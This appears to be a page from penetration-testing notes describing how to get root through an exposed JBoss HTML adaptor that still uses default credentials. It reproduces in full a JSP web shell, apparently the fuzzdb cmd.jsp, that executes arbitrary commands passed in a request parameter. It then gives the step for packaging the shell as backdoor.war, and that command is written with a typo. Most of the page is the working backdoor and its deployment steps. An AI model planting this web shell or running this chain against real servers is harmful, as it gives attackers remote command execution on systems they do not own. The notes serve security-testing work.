HTML Adapter to Root

JBoss instance running on port 8080 with default credentials.

The main deployer can be used to execute code.

This value is interesting as it can be used to deploy a malicious JSP. Used the code from here

https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/jsp/cmd.jspraw.githubusercontent.com

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

Generate a war file and then deploy using the application.

jav -cvf backdoor.war backdoor.jsp

PreviousLDAP NextInsecure RMI

Last updated 2 years ago